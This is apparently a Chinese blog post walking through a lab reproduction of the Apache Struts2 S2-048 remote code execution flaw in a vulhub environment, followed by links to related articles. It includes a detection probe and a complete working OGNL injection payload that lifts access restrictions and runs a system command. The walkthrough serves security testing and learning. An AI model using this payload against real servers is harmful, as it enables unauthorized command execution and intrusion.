s2-048漏洞测试报告

最新推荐文章于 2022-04-21 10:01:51 发布
最新推荐文章于 2022-04-21 10:01:51 发布
阅读量309 收藏 2
点赞数
文章标签: s2-048漏洞 struts2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZYH_boss/article/details/102469914
版权

实验环境:vulhub、strusts漏洞测试工具

开始:打开vulhub
在这里插入图片描述
进入struts2 -s2-048
在这里插入图片描述
查看开放端口
在这里插入图片描述
ifconfig找到ip
在这里插入图片描述
在浏览器上输入ip地址加上8080端口,如下图所示
在这里插入图片描述
在输入框输入${233233},提交
在这里插入图片描述
出现54289(233233)的答案,说明存在漏洞
在这里插入图片描述
使用代码(加粗为可修改) 可查看到相应的信息。
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)?(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream())).(#q)}

在这里插入图片描述
也可使用测试工具
在这里插入图片描述
将网址复制上去,点击验证漏洞
在这里插入图片描述
出现048漏洞警告
在这里插入图片描述
完成!

弖峠
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞
09-08
2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值...
[渗透测试]—3.3 漏洞评估和报告编写
Andy0214的专栏
06-26 6431
摘要部分简要概述渗透测试的目标、范围、时间和主要发现。这部分内容应该简洁明了,方便读者快速了解渗透测试的背景和重要信息。
软件安全漏洞测试报告_现实生活中的软件安全漏洞以及如何确保安全
编程故事的地方
01-22 2403
软件安全漏洞测试报告 现在,我们生活中最重要的方面,包括财务,身份和医疗保健,都取决于代码。 现在,软件安全不仅对于公司而且对于个人而言都是至关重要的方面。 任何使用现代软件产品和服务的人都希望了解基本的软件安全性概念,以保持生活的幸福。 对于致力于设计,创建或维护这些产品和服务的任何开发人员,必须全面了解安全漏洞和安全最佳做法,以避免可能导致安全损失甚至数百人,数千人甚至数百万人死亡的安全...
[旧文系列] Struts2历史高危漏洞系列-part6:S2-059/S2-061
mole_exp的博客
01-18 1361
文章目录关于<旧文系列>前言S2-059漏洞复现与分析可回显PoC漏洞修复S2-061漏洞复现与分析可回显PoC漏洞修复小结Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 https://forum.butian.net
漏洞扫描报告
H_cookie的博客
04-21 2059
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一.CTF基础知识CTF简介CTF竞赛CTF比赛形式CTF题目二.Web(信息泄露下的目录遍历、PHPINFO、备份文件下载)(一)目录遍历1、开启题目2、寻找flag(二)PHPINFO1、开启题目3、寻找flag(三)备份文件下载1、网站源码技能树解题过程(1)、开启题目(2)、使用Burp Suite Community Edition软件(3)、回到题目进行操作2、bak文件(1)、开启题目(2)、在题目网址上进行操作3、.
漏洞复现实验报告
qq_45721890的博客
10-30 3614
漏洞复现实验报告 一、 概述 1.1项目背景 织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 2018 年 1 月 10 日,锦行信息安全公众号公开了一个关于 DeDeCMS前台任意用户密码修
Struts2_s2-016&017&ognl2.6.11_patch漏洞补丁
07-25
struts.xml文件中新增以下内容: <!-- 为修复struts2 s2-016、s2-017漏洞,重写DefaultActionMapper --> ... struts2_s2-016&017_patch.jar拷贝到lib目录下。...使用工具进行测试漏洞是否依然存在。 2013年7月25日
S2-016/017漏洞工具 struts漏洞
02-26
本工具可以详细测试S2-016/017漏洞的资源,有助于您更深层的了解struts!
S2-045 struts2-core-2.3.32.jar 相关jar包,测试可用
03-09
目前Struts2官方已经确认漏洞漏洞编号S2-045,CVE编号:cve-2017-5638),并定级为高危风险。 该漏洞的影响范围:Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10。 修复方式:更新至Struts 2.3.32...
struts2漏洞利用检测工具新添加了struts-048
01-09
增加S2-048 Struts 2.3.X 支持检查官方示例struts2-showcase应用的代码执行漏洞,参考地址:http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action
S2-048 远程代码执行漏洞
锋刃科技的博客
06-29 335
影响版本 2.0.0 - 2.3.32 漏洞搭建 cd vulhub/struts2/s2-048 docker-compose up -d 环境启动后,访问http://your-ip:8080/showcase/即可查看到struts2的测试页面。 漏洞复现 访问Integration->Struts 1 Integration: 触发OGNL表达式的位置是Gangster Name这个表单。 输入${233*233}即可查看执行结果(剩下两个表单随意填写) 发
渗透测试公司 APP安全漏洞检测报告
网站安全专家
10-21 683
2019年第三季度以来,我们SINE安全,APP漏洞检测中心发现许多APP被检测出含有高危漏洞,包括目前漏洞比较严重的SIM卡漏洞以及安卓端、IOS端漏洞,根据上半年的安全检测以及漏洞测试分析发现,目前移动APP软件漏洞的发展速度上涨百分之30,大部分的APP漏洞都已被商业利用以及窃取用户隐私信息,造成APP软件的数据泄露,数据被篡改,等等。 我们来统计一下目前发现的APP漏洞: 第一个是...
扫描漏洞报告
沐夏fyf
09-03 6843
左上角新建 可以看到添加了一个 还是使用常规完全扫描 执行扫描 打开安装 下一步-安装 安装 安装这个世界第一好用的浏览器 点击查看 用360浏览器打开天境查看扫描内容 已完成-查看报表 可以通过浏览器搜索漏洞名称获取解决方法 生成报表 生成报表-确定 下载查看 nessus新建扫描用来与 天境做对比 all 天境扫描的文件移到物理机打开 ...
漏洞复现(CVE-2017-10271)
PDblue的博客
03-27 9631
使用https://github.com/vulhub/vulhub在本地进行漏洞环境搭建,需要使用的工具是https://github.com/hanc00l/weblogic_wls_wsat_rce 环境搭建完成后通过浏览器进行访问 使用工具对漏洞进行验证 向服务器上传后门文件 通过浏览器访问后门文件 仅限于本地漏洞环境验证。...
网站安全漏洞检测报告年度安全分析
网站安全专家
07-22 1273
网站安全仍然是目前互联网网络安全的最大安全风险来源第一,包括现有的PC网站,移动端网站,APP,微信API接口小程序的流量越来越多,尤其移动端的访问超过了单独的PC站点,手机移动用户多余PC电脑,人们的生活习惯也在改变,APP的流量占据整个互联网的市场,简单易用的同时,也带来了新的网站安全方面的问题,APP的安全问题,也层出不穷。 据我们SINE安全公司对整个2019年的第一季度,第二季度的...
S2-045远程代码执行漏洞
a1b2c3是弱口令
12-20 2462
Apache Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 影响范围 Struts 2.3.5 – Struts 2.3.31 Struts ...
Vulhub漏洞复现之Apache解析漏洞总结
来到了学渣的博客
01-30 3952
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 前文: 名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别 Vulhub漏洞复现之Dns域传送漏洞 Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574) Vulhub漏洞复现之Th...
测试套件和测试报告生成步骤
dejuanZ的博客
08-10 1437
TestSuite和defaultTestLoader的区别 TestSuite(测试套件) 步骤 defaultTestLoader 步骤 测试报告生成步骤 TestSuite和defaultTestLoader的区别 TestSuite可以添加TestCase中所有以“test”开头的方法和添加指定的以“test”开头的方法。 defaultTestLoader搜...
s2-005漏洞解决方法
最新发布
09-09
S2-005漏洞是指在使用Struts 2框架的Web应用程序...综上所述,通过升级Struts 2框架、过滤用户输入、使用安全配置文件、强化访问控制、日志监控和安全测试等措施,可以有效地解决S2-005漏洞,提高Web应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值